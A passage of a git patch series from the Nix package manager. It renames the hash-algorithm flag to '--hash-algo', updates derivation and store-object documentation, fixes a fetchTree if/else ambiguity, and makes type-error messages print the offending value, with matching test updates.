in. + +* `fileHash`: + + A digest for the compressed archive itself, as opposed to the data contained within. + +* `fileSize`: + + The size of the compressed archive itself. + +## Computed closure fields + +These fields are not stored at all, but computed by traverising the other other fields across all the store objects in a [closure]. + +* `closureSize`: + + The total size of the compressed archive itself for this object, and the compressed archive of every object in this object's [closure]. + +### `.narinfo` extra fields + +* `closureSize`: + + The total size of this store object and every other object in its [closure]. + +[closure]: @docroot@/glossary.md#gloss-closure diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 49a4c1f2a..3107c8aed 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -635,7 +635,7 @@ public: - the store object has been signed using a key in the trusted keys list - the [`require-sigs`](#conf-require-sigs) option has been set to `false` - - the store object is [output-addressed](@docroot@/glossary.md#gloss-output-addressed-store-object) + - the store object is [content-addressed](@docroot@/glossary.md#gloss-content-addressed-store-object) )", {"binary-cache-public-keys"}}; diff --git a/src/nix/derivation-add.md b/src/nix/derivation-add.md index f116681ab..d9b8467df 100644 --- a/src/nix/derivation-add.md +++ b/src/nix/derivation-add.md @@ -9,10 +9,11 @@ Store derivations are used internally by Nix. They are store paths with extension `.drv` that represent the build-time dependency graph to which a Nix expression evaluates. -[store derivation]: ../../glossary.md#gloss-store-derivation -The JSON format is documented under the [`derivation show`] command. +[store derivation]: @docroot@/glossary.md#gloss-store-derivation -[`derivation show`]: ./nix3-derivation-show.md +`nix derivation add` takes a single derivation in the following format: + +{{#include ../../json/derivation.md}} )"" diff --git a/src/nix/derivation-show.md b/src/nix/derivation-show.md index 1296e2885..884f1adc6 100644 --- a/src/nix/derivation-show.md +++ b/src/nix/derivation-show.md @@ -5,8 +5,6 @@ R""( * Show the [store derivation] that results from evaluating the Hello package: - [store derivation]: ../../glossary.md#gloss-store-derivation - ```console # nix derivation show nixpkgs#hello { @@ -48,62 +46,12 @@ a Nix expression evaluates. By default, this command only shows top-level derivations, but with `--recursive`, it also shows their dependencies. -The JSON output is a JSON object whose keys are the store paths of the -derivations, and whose values are a JSON object with the following -fields: +[store derivation]: @docroot@/glossary.md#gloss-store-derivation -* `name`: The name of the derivation. This is used when calculating the - store paths of the derivation's outputs. +`nix derivation show` outputs a JSON map of [store path]s to derivations in the following format: -* `outputs`: Information about the output paths of the - derivation. This is a JSON object with one member per output, where - the key is the output name and the value is a JSON object with these - fields: +[store path]: @docroot@/glossary.md#gloss-store-path - * `path`: The output path. - * `hashAlgo`: For fixed-output derivations, the hashing algorithm - (e.g. `sha256`), optionally prefixed by `r:` if `hash` denotes a - NAR hash rather than a flat file hash. - * `hash`: For fixed-output derivations, the expected content hash in - base-16. - - Example: - - ```json - "outputs": { - "out": { - "path": "/nix/store/2543j7c6jn75blc3drf4g5vhb1rhdq29-source", - "hashAlgo": "r:sha256", - "hash": "6fc80dcc62179dbc12fc0b5881275898f93444833d21b89dfe5f7fbcbb1d0d62" - } - } - ``` - -* `inputSrcs`: A list of store paths on which this derivation depends. - -* `inputDrvs`: A JSON object specifying the derivations on which this - derivation depends, and what outputs of those derivations. For - example, - - ```json - "inputDrvs": { - "/nix/store/6lkh5yi7nlb7l6dr8fljlli5zfd9hq58-curl-7.73.0.drv": ["dev"], - "/nix/store/fn3kgnfzl5dzym26j8g907gq3kbm8bfh-unzip-6.0.drv": ["out"] - } - ``` - - specifies that this derivation depends on the `dev` output of - `curl`, and the `out` output of `unzip`. - -* `system`: The system type on which this derivation is to be built - (e.g. `x86_64-linux`). - -* `builder`: The absolute path of the program to be executed to run - the build. Typically this is the `bash` shell - (e.g. `/nix/store/r3j288vpmczbl500w6zz89gyfa4nr0b1-bash-4.4-p23/bin/bash`). - -* `args`: The command-line arguments passed to the `builder`. - -* `env`: The environment passed to the `builder`. +{{#include ../../json/derivation.md}} )"" From 65294fe5fe4fd5419ea374e73710e8a217ba8060 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 20 Jan 2024 17:07:21 -0500 Subject: [PATCH 319/654] Fix typo in upcomming release notes Thanks @cole-h for finding in https://github.com/NixOS/nix/pull/9815#discussion_r1460604130 --- doc/manual/rl-next/nix-store-add.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md index d55711569..5ef2913b4 100644 --- a/doc/manual/rl-next/nix-store-add.md +++ b/doc/manual/rl-next/nix-store-add.md @@ -4,4 +4,4 @@ prs: 9809 --- Adds a missing feature that was present in the old CLI, and matches our -plans to have similar flags for `nix hash convert` and `hash hash path`. +plans to have similar flags for `nix hash convert` and `nix hash path`. From 202c5e2afc14232b3c9ff32b014387d76c45b3d7 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 20:14:48 -0500 Subject: [PATCH 320/654] Start standardizing hash algo flags Do this if we want to do `--hash-algo` everywhere, and not `--algo` for hash commands. The new `nix hash convert` is updated. Deprecated new CLI commands are left as-is (`nix hash path` needs to be redone and is also left as-is). --- doc/manual/rl-next/nix-hash-convert.md | 12 +++++----- src/libutil/args.hh | 6 +++++ src/nix/add-to-store.cc | 2 +- src/nix/hash.cc | 2 +- tests/functional/hash.sh | 32 +++++++++++++------------- 5 files changed, 30 insertions(+), 24 deletions(-) diff --git a/doc/manual/rl-next/nix-hash-convert.md b/doc/manual/rl-next/nix-hash-convert.md index 2b718a66b..69db9508a 100644 --- a/doc/manual/rl-next/nix-hash-convert.md +++ b/doc/manual/rl-next/nix-hash-convert.md @@ -9,7 +9,7 @@ to stabilization! Examples: - Convert the hash to `nix32`. ```bash - $ nix hash convert --algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" + $ nix hash convert --hash-algo "sha1" --to nix32 "800d59cfcd3c05e900cb4e214be48f6b886a08df" vw46m23bizj4n8afrc0fj19wrp7mj3c0 ``` `nix32` is a base32 encoding with a nix-specific character set. @@ -17,23 +17,23 @@ to stabilization! Examples: hash. - Convert the hash to the `sri` format that includes an algorithm specification: ```bash - nix hash convert --algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" + nix hash convert --hash-algo "sha1" "800d59cfcd3c05e900cb4e214be48f6b886a08df" sha1-gA1Zz808BekAy04hS+SPa4hqCN8= ``` or with an explicit `-to` format: ```bash - nix hash convert --algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" + nix hash convert --hash-algo "sha1" --to sri "800d59cfcd3c05e900cb4e214be48f6b886a08df" sha1-gA1Zz808BekAy04hS+SPa4hqCN8= ``` - Assert the input format of the hash: ```bash - nix hash convert --algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" + nix hash convert --hash-algo "sha256" --from nix32 "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=" error: input hash 'ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0=' does not have the expected format '--from nix32' - nix hash convert --algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" + nix hash convert --hash-algo "sha256" --from nix32 "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" sha256-ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0= ``` -The `--to`/`--from`/`--algo` parameters have context-sensitive auto-completion. +The `--to`/`--from`/`--hash-algo` parameters have context-sensitive auto-completion. ## Related Deprecations diff --git a/src/libutil/args.hh b/src/libutil/args.hh index 18b0ae583..6c9c48065 100644 --- a/src/libutil/args.hh +++ b/src/libutil/args.hh @@ -177,7 +177,13 @@ protected: std::optional experimentalFeature; static Flag mkHashAlgoFlag(std::string && longName, HashAlgorithm * ha); + static Flag mkHashAlgoFlag(HashAlgorithm * ha) { + return mkHashAlgoFlag("hash-algo", ha); + } static Flag mkHashAlgoOptFlag(std::string && longName, std::optional * oha); + static Flag mkHashAlgoOptFlag(std::optional * oha) { + return mkHashAlgoOptFlag("hash-algo", oha); + } static Flag mkHashFormatFlagWithDefault(std::string && longName, HashFormat * hf); static Flag mkHashFormatOptFlag(std::string && longName, std::optional * ohf); }; diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index f2dbe8a2c..7c534517d 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -53,7 +53,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand }}, }); - addFlag(Flag::mkHashAlgoFlag("hash-algo", &hashAlgo)); + addFlag(Flag::mkHashAlgoFlag(&hashAlgo)); } void run(ref store) override diff --git a/src/nix/hash.cc b/src/nix/hash.cc index 83694306e..8ab89e433 100644 --- a/src/nix/hash.cc +++ b/src/nix/hash.cc @@ -141,7 +141,7 @@ struct CmdHashConvert : Command CmdHashConvert(): to(HashFormat::SRI) { addFlag(Args::Flag::mkHashFormatOptFlag("from", &from)); addFlag(Args::Flag::mkHashFormatFlagWithDefault("to", &to)); - addFlag(Args::Flag::mkHashAlgoOptFlag("algo", &algo)); + addFlag(Args::Flag::mkHashAlgoOptFlag(&algo)); expectArgs({ .label = "hashes", .handler = {&hashStrings}, diff --git a/tests/functional/hash.sh b/tests/functional/hash.sh index 47eed5178..ff270076e 100644 --- a/tests/functional/hash.sh +++ b/tests/functional/hash.sh @@ -87,7 +87,7 @@ try3() { # $2 = expected hash in base16 # $3 = expected hash in base32 # $4 = expected hash in base64 - h64=$(nix hash convert --algo "$1" --to base64 "$2") + h64=$(nix hash convert --hash-algo "$1" --to base64 "$2") [ "$h64" = "$4" ] h64=$(nix-hash --type "$1" --to-base64 "$2") [ "$h64" = "$4" ] @@ -95,13 +95,13 @@ try3() { h64=$(nix hash to-base64 --type "$1" "$2") [ "$h64" = "$4" ] - sri=$(nix hash convert --algo "$1" --to sri "$2") + sri=$(nix hash convert --hash-algo "$1" --to sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix-hash --type "$1" --to-sri "$2") [ "$sri" = "$1-$4" ] sri=$(nix hash to-sri --type "$1" "$2") [ "$sri" = "$1-$4" ] - h32=$(nix hash convert --algo "$1" --to base32 "$2") + h32=$(nix hash convert --hash-algo "$1" --to base32 "$2") [ "$h32" = "$3" ] h32=$(nix-hash --type "$1" --to-base32 "$2") [ "$h32" = "$3" ] @@ -110,7 +110,7 @@ try3() { h16=$(nix-hash --type "$1" --to-base16 "$h32") [ "$h16" = "$2" ] - h16=$(nix hash convert --algo "$1" --to base16 "$h64") + h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64") [ "$h16" = "$2" ] h16=$(nix hash to-base16 --type "$1" "$h64") [ "$h16" = "$2" ] @@ -143,40 +143,40 @@ try3() { # Auto-detecting the input from algo and length. # - sri=$(nix hash convert --algo "$1" "$2") + sri=$(nix hash convert --hash-algo "$1" "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$3") + sri=$(nix hash convert --hash-algo "$1" "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$4") + sri=$(nix hash convert --hash-algo "$1" "$4") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$2") + sri=$(nix hash convert --hash-algo "$1" "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$3") + sri=$(nix hash convert --hash-algo "$1" "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" "$4") + sri=$(nix hash convert --hash-algo "$1" "$4") [ "$sri" = "$1-$4" ] # # Asserting input format succeeds. # - sri=$(nix hash convert --algo "$1" --from base16 "$2") + sri=$(nix hash convert --hash-algo "$1" --from base16 "$2") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from nix32 "$3") + sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3") [ "$sri" = "$1-$4" ] - sri=$(nix hash convert --algo "$1" --from base64 "$4") + sri=$(nix hash convert --hash-algo "$1" --from base64 "$4") [ "$sri" = "$1-$4" ] # # Asserting input format fails. # - fail=$(nix hash convert --algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] - fail=$(nix hash convert --algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") + fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?") [[ "$fail" == *"error: input hash"*"exit: 1" ]] } From 0bcdb4f5f0830261ecbff1cbc805b215cac1abae Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 08:38:52 -0500 Subject: [PATCH 321/654] Elaborate what the monthly assignments status check entails Co-authored-by: Robert Hensing --- maintainers/README.md | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/maintainers/README.md b/maintainers/README.md index 585e2b50a..fa321c7c0 100644 --- a/maintainers/README.md +++ b/maintainers/README.md @@ -44,7 +44,10 @@ The team meets twice a week: 1. Triage issues and pull requests from the [No Status](#no-status) column (30 min) 2. Discuss issues and pull requests from the [To discuss](#to-discuss) column (30 min). - Once a month, this slot is used to check the [Assigned](#assigned) column to make sure that nothing bitrots in it. + Once a month, each team member checks the [Assigned](#assigned) column for prs/issues assigned to them, to either + - unblock it by providing input + - mark it as draft if it is blocked on the contributor + - escalate it back to the team by moving it to To discuss, and leaving a comment as to why the issue needs to be discussed again. - Work meeting: [Mondays 13:00-15:00 CET](https://calendar.google.com/calendar/event?eid=NTM1MG1wNGJnOGpmOTZhYms3bTB1bnY5cWxfMjAyMjExMjFUMTIwMDAwWiBiOW81MmZvYnFqYWs4b3E4bGZraGczdDBxZ0Bn) From 80b84710b8c676620ed1e8bf8ff3bb1d5bc19b80 Mon Sep 17 00:00:00 2001 From: pennae <82953136+pennae@users.noreply.github.com> Date: Mon, 22 Jan 2024 15:15:53 +0100 Subject: [PATCH 322/654] Update src/libexpr/eval.cc Co-authored-by: John Ericson --- src/libexpr/eval.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index dc9167144..2330102c3 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -427,7 +427,7 @@ EvalState::EvalState( .or_ = symbols.create("or"), .findFile = symbols.create("__findFile"), .nixPath = symbols.create("__nixPath"), - .body = symbols.create("body") + .body = symbols.create("body"), } , repair(NoRepair) , emptyBindings(0) From 316e50cc7c0bad8448c9f475993e52f9d5dee7c0 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 10:32:25 -0500 Subject: [PATCH 323/654] Fix `if`...`if`...`else` ambiguity This can be parsed two ways. Add a pair of braces so it must be parsed the intended way. --- src/libexpr/primops/fetchTree.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc index bc5a69720..d32c264f7 100644 --- a/src/libexpr/primops/fetchTree.cc +++ b/src/libexpr/primops/fetchTree.cc @@ -174,11 +174,12 @@ static void fetchTree( if (!evalSettings.pureEval && !input.isDirect() && experimentalFeatureSettings.isEnabled(Xp::Flakes)) input = lookupInRegistries(state.store, input).first; - if (evalSettings.pureEval && !input.isLocked()) + if (evalSettings.pureEval && !input.isLocked()) { if (params.isFetchGit) state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchGit' requires a locked input, at %s", state.positions[pos])); else state.debugThrowLastTrace(EvalError("in pure evaluation mode, 'fetchTree' requires a locked input, at %s", state.positions[pos])); + } state.checkURI(input.toURLString()); From cb7fbd4d831de9d98b7dfd149d8a96939be31bb2 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Wed, 6 Dec 2023 16:03:01 -0800 Subject: [PATCH 324/654] Print value on type error Adds the failing value to `value is while a is expected` error messages. --- .../rl-next/print-value-in-type-error.md | 23 ++ .../rl-next/source-positions-in-errors.md | 2 +- doc/manual/rl-next/with-error-reporting.md | 4 +- src/libexpr/eval-inline.hh | 11 +- src/libexpr/eval.cc | 38 ++- src/libexpr/primops.cc | 2 +- src/libexpr/print-ambiguous.cc | 1 + src/libexpr/print-options.hh | 12 + src/libexpr/print.cc | 7 + src/libexpr/print.hh | 21 +- src/libutil/error.cc | 4 +- src/nix/eval.cc | 2 +- tests/functional/dyn-drv/eval-outputOf.sh | 2 +- .../lang/eval-fail-attr-name-type.err.exp | 2 +- .../lang/eval-fail-call-primop.err.exp | 2 +- tests/functional/lang/eval-fail-list.err.exp | 2 +- .../lang/eval-fail-set-override.err.exp | 2 +- .../eval-fail-using-set-as-attr-name.err.exp | 2 +- tests/unit/libexpr/error_traces.cc | 224 +++++++++--------- 19 files changed, 227 insertions(+), 136 deletions(-) create mode 100644 doc/manual/rl-next/print-value-in-type-error.md diff --git a/doc/manual/rl-next/print-value-in-type-error.md b/doc/manual/rl-next/print-value-in-type-error.md new file mode 100644 index 000000000..aaae22756 --- /dev/null +++ b/doc/manual/rl-next/print-value-in-type-error.md @@ -0,0 +1,23 @@ +--- +synopsis: Type errors include the failing value +issues: #561 +prs: #9753 +--- + +In errors like `value is an integer while a list was expected`, the message now +includes the failing value. + +Before: + +``` + error: value is a set while a string was expected +``` + +After: + +``` + error: expected a string but found a set: { ghc810 = «thunk»; + ghc8102Binary = «thunk»; ghc8107 = «thunk»; ghc8107Binary = «thunk»; + ghc865Binary = «thunk»; ghc90 = «thunk»; ghc902 = «thunk»; ghc92 = «thunk»; + ghc924Binary = «thunk»; ghc925 = «thunk»; «17 attributes elided»} +``` diff --git a/doc/manual/rl-next/source-positions-in-errors.md b/doc/manual/rl-next/source-positions-in-errors.md index 5b210289d..b1a33d83b 100644 --- a/doc/manual/rl-next/source-positions-in-errors.md +++ b/doc/manual/rl-next/source-positions-in-errors.md @@ -38,5 +38,5 @@ error: | ^ 5| - error: value is a set while a string was expected + error: expected a string but found a set ``` diff --git a/doc/manual/rl-next/with-error-reporting.md b/doc/manual/rl-next/with-error-reporting.md index 10b020956..d9e07df52 100644 --- a/doc/manual/rl-next/with-error-reporting.md +++ b/doc/manual/rl-next/with-error-reporting.md @@ -8,7 +8,7 @@ prs: 9658 Previously an incorrect `with` expression would report no position at all, making it hard to determine where the error originated: ``` -nix-repl> with 1; a +nix-repl> with 1; a error: … @@ -27,5 +27,5 @@ error: 1| with 1; a | ^ - error: value is an integer while a set was expected + error: expected a set but found an integer ``` diff --git a/src/libexpr/eval-inline.hh b/src/libexpr/eval-inline.hh index f7710f819..42cb68bbe 100644 --- a/src/libexpr/eval-inline.hh +++ b/src/libexpr/eval-inline.hh @@ -1,6 +1,7 @@ #pragma once ///@file +#include "print.hh" #include "eval.hh" namespace nix { @@ -114,7 +115,10 @@ inline void EvalState::forceAttrs(Value & v, Callable getPos, std::string_view e PosIdx pos = getPos(); forceValue(v, pos); if (v.type() != nAttrs) { - error("value is %1% while a set was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); + error("expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withTrace(pos, errorCtx).debugThrow(); } } @@ -124,7 +128,10 @@ inline void EvalState::forceList(Value & v, const PosIdx pos, std::string_view e { forceValue(v, pos); if (!v.isList()) { - error("value is %1% while a list was expected", showType(v)).withTrace(pos, errorCtx).debugThrow(); + error("expected a list but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withTrace(pos, errorCtx).debugThrow(); } } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 0659a2173..71e956e10 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -2,6 +2,7 @@ #include "eval-settings.hh" #include "hash.hh" #include "primops.hh" +#include "print-options.hh" #include "types.hh" #include "util.hh" #include "store-api.hh" @@ -29,9 +30,9 @@ #include #include #include -#include #include #include +#include #include #include @@ -1153,7 +1154,10 @@ inline bool EvalState::evalBool(Env & env, Expr * e, const PosIdx pos, std::stri Value v; e->eval(*this, env, v); if (v.type() != nBool) - error("value is %1% while a Boolean was expected", showType(v)).withFrame(env, *e).debugThrow(); + error("expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withFrame(env, *e).debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -1167,7 +1171,10 @@ inline void EvalState::evalAttrs(Env & env, Expr * e, Value & v, const PosIdx po try { e->eval(*this, env, v); if (v.type() != nAttrs) - error("value is %1% while a set was expected", showType(v)).withFrame(env, *e).debugThrow(); + error("expected a set but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .withFrame(env, *e).debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2076,7 +2083,10 @@ NixInt EvalState::forceInt(Value & v, const PosIdx pos, std::string_view errorCt try { forceValue(v, pos); if (v.type() != nInt) - error("value is %1% while an integer was expected", showType(v)).debugThrow(); + error("expected an integer but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.integer; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2092,7 +2102,10 @@ NixFloat EvalState::forceFloat(Value & v, const PosIdx pos, std::string_view err if (v.type() == nInt) return v.integer; else if (v.type() != nFloat) - error("value is %1% while a float was expected", showType(v)).debugThrow(); + error("expected a float but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.fpoint; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2106,7 +2119,10 @@ bool EvalState::forceBool(Value & v, const PosIdx pos, std::string_view errorCtx try { forceValue(v, pos); if (v.type() != nBool) - error("value is %1% while a Boolean was expected", showType(v)).debugThrow(); + error("expected a Boolean but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.boolean; } catch (Error & e) { e.addTrace(positions[pos], errorCtx); @@ -2126,7 +2142,10 @@ void EvalState::forceFunction(Value & v, const PosIdx pos, std::string_view erro try { forceValue(v, pos); if (v.type() != nFunction && !isFunctor(v)) - error("value is %1% while a function was expected", showType(v)).debugThrow(); + error("expected a function but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); throw; @@ -2139,7 +2158,10 @@ std::string_view EvalState::forceString(Value & v, const PosIdx pos, std::string try { forceValue(v, pos); if (v.type() != nString) - error("value is %1% while a string was expected", showType(v)).debugThrow(); + error("expected a string but found %1%: %2%", + showType(v), + ValuePrinter(*this, v, errorPrintOptions)) + .debugThrow(); return v.string_view(); } catch (Error & e) { e.addTrace(positions[pos], errorCtx); diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index c08aea898..5032e95cc 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -997,7 +997,7 @@ static void prim_trace(EvalState & state, const PosIdx pos, Value * * args, Valu if (args[0]->type() == nString) printError("trace: %1%", args[0]->string_view()); else - printError("trace: %1%", printValue(state, *args[0])); + printError("trace: %1%", ValuePrinter(state, *args[0])); state.forceValue(*args[1], pos); v = *args[1]; } diff --git a/src/libexpr/print-ambiguous.cc b/src/libexpr/print-ambiguous.cc index 07c398dd2..521250cec 100644 --- a/src/libexpr/print-ambiguous.cc +++ b/src/libexpr/print-ambiguous.cc @@ -1,6 +1,7 @@ #include "print-ambiguous.hh" #include "print.hh" #include "signals.hh" +#include "eval.hh" namespace nix { diff --git a/src/libexpr/print-options.hh b/src/libexpr/print-options.hh index 11ff9ae87..aba2eaeae 100644 --- a/src/libexpr/print-options.hh +++ b/src/libexpr/print-options.hh @@ -49,4 +49,16 @@ struct PrintOptions size_t maxStringLength = std::numeric_limits::max(); }; +/** + * `PrintOptions` for unknown and therefore potentially large values in error messages, + * to avoid printing "too much" output. + */ +static PrintOptions errorPrintOptions = PrintOptions { + .ansiColors = true, + .maxDepth = 10, + .maxAttrs = 10, + .maxListItems = 10, + .maxStringLength = 1024 +}; + } diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index db26ed4c2..dad6dc9ad 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -7,6 +7,7 @@ #include "store-api.hh" #include "terminal.hh" #include "english.hh" +#include "eval.hh" namespace nix { @@ -501,4 +502,10 @@ void printValue(EvalState & state, std::ostream & output, Value & v, PrintOption Printer(output, state, options).print(v); } +std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) +{ + printValue(printer.state, output, printer.value, printer.options); + return output; +} + } diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index 40207d777..a8300264a 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,11 +9,13 @@ #include -#include "eval.hh" #include "print-options.hh" namespace nix { +class EvalState; +struct Value; + /** * Print a string as a Nix string literal. * @@ -59,4 +61,21 @@ std::ostream & printIdentifier(std::ostream & o, std::string_view s); void printValue(EvalState & state, std::ostream & str, Value & v, PrintOptions options = PrintOptions {}); +/** + * A partially-applied form of `printValue` which can be formatted using `<<` + * without allocating an intermediate string. + */ +class ValuePrinter { + friend std::ostream & operator << (std::ostream & output, const ValuePrinter & printer); +private: + EvalState & state; + Value & value; + PrintOptions options; + +public: + ValuePrinter(EvalState & state, Value & value, PrintOptions options = PrintOptions {}) + : state(state), value(value), options(options) { } +}; + +std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); } diff --git a/src/libutil/error.cc b/src/libutil/error.cc index bd2f6b840..1f0cb08c9 100644 --- a/src/libutil/error.cc +++ b/src/libutil/error.cc @@ -335,7 +335,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * try { * e->eval(*this, env, v); * if (v.type() != nAttrs) - * throwTypeError("value is %1% while a set was expected", v); + * throwTypeError("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; @@ -349,7 +349,7 @@ std::ostream & showErrorInfo(std::ostream & out, const ErrorInfo & einfo, bool s * e->eval(*this, env, v); * try { * if (v.type() != nAttrs) - * throwTypeError("value is %1% while a set was expected", v); + * throwTypeError("expected a set but found %1%", v); * } catch (Error & e) { * e.addTrace(pos, errorCtx); * throw; diff --git a/src/nix/eval.cc b/src/nix/eval.cc index b34af34e0..a89fa7412 100644 --- a/src/nix/eval.cc +++ b/src/nix/eval.cc @@ -121,7 +121,7 @@ struct CmdEval : MixJSON, InstallableValueCommand, MixReadOnlyOption else { state->forceValueDeep(*v); - logger->cout("%s", printValue(*state, *v)); + logger->cout("%s", ValuePrinter(*state, *v, PrintOptions { .force = true })); } } }; diff --git a/tests/functional/dyn-drv/eval-outputOf.sh b/tests/functional/dyn-drv/eval-outputOf.sh index 9467feb8d..3681bd098 100644 --- a/tests/functional/dyn-drv/eval-outputOf.sh +++ b/tests/functional/dyn-drv/eval-outputOf.sh @@ -14,7 +14,7 @@ nix --experimental-features 'nix-command' eval --impure --expr \ # resolve first. Adding a test so we don't liberalise it by accident. expectStderr 1 nix --experimental-features 'nix-command dynamic-derivations' eval --impure --expr \ 'builtins.outputOf (import ../dependencies.nix {}) "out"' \ - | grepQuiet "value is a set while a string was expected" + | grepQuiet "expected a string but found a set" # Test that "DrvDeep" string contexts are not supported at this time # diff --git a/tests/functional/lang/eval-fail-attr-name-type.err.exp b/tests/functional/lang/eval-fail-attr-name-type.err.exp index 23cceb58a..c8d56ba7d 100644 --- a/tests/functional/lang/eval-fail-attr-name-type.err.exp +++ b/tests/functional/lang/eval-fail-attr-name-type.err.exp @@ -13,4 +13,4 @@ error: | ^ 8| - error: value is an integer while a string was expected + error: expected a string but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-call-primop.err.exp b/tests/functional/lang/eval-fail-call-primop.err.exp index ae5b55ed4..0c6f614e8 100644 --- a/tests/functional/lang/eval-fail-call-primop.err.exp +++ b/tests/functional/lang/eval-fail-call-primop.err.exp @@ -7,4 +7,4 @@ error: … while evaluating the first argument passed to builtins.length - error: value is an integer while a list was expected + error: expected a list but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-list.err.exp b/tests/functional/lang/eval-fail-list.err.exp index 4320fc022..d492f8bd2 100644 --- a/tests/functional/lang/eval-fail-list.err.exp +++ b/tests/functional/lang/eval-fail-list.err.exp @@ -5,4 +5,4 @@ error: | ^ 2| - error: value is an integer while a list was expected + error: expected a list but found an integer: 8 diff --git a/tests/functional/lang/eval-fail-set-override.err.exp b/tests/functional/lang/eval-fail-set-override.err.exp index 71481683d..9006ca4e6 100644 --- a/tests/functional/lang/eval-fail-set-override.err.exp +++ b/tests/functional/lang/eval-fail-set-override.err.exp @@ -1,4 +1,4 @@ error: … while evaluating the `__overrides` attribute - error: value is an integer while a set was expected + error: expected a set but found an integer: 1 diff --git a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp index 0a4f56ac5..94784c651 100644 --- a/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp +++ b/tests/functional/lang/eval-fail-using-set-as-attr-name.err.exp @@ -6,4 +6,4 @@ error: | ^ 6| - error: value is a set while a string was expected + error: expected a string but found a set: { } diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 81498f65a..f0cad58bb 100644 --- 